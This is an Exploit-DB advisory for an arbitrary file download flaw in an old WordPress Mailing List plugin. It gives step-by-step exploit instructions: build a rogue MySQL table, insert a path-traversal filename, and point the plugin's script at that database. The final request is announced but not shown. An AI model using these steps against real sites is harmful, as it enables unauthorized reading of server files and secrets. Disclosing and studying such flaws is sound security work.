WordPress Mailing List Plugin - Arbitrary File Download

EDB-ID: 18276 CVE: N/A OSVDB-ID: 78025
Verified: Author: 6Scan Published: 2011-12-26
Download Exploit: Source Raw Download Vulnerable App:
#Exploit Title: Mailing List plugin for Wordpress Arbitrary file download
#Version:  < 1.4.2
#Date: 2011-12-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/mailz/
#Official fix: This advisory is released after the vendor (http://www.zingiri.com)  was contacted and fixed the issue promptly.
#Description :  Unauthorized users can download arbitrary files from the server using this exploit.
#                                                             Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host.
#                                                             The bug is in config.php, but accessible from other file.

1) Setup mysql database
2) Create table with the next structure:
CREATE TABLE IF NOT EXISTS `phplist_attachment` (
  `filename` varchar(1024) NOT NULL,
  `mimetype` varchar(1024) NOT NULL,
  `remotefile` varchar(1024) NOT NULL,
  `description` varchar(1024) NOT NULL,
  `size` int(11) NOT NULL,
  `id` int(11) NOT NULL

3) Add this raw into database:
INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES
('../../../../../somefile.txt', '', '', '', 0, 0);

4) Call the script with database parameters and file id to download:

The credentials are now saved in session, and there is no need to continue passing them: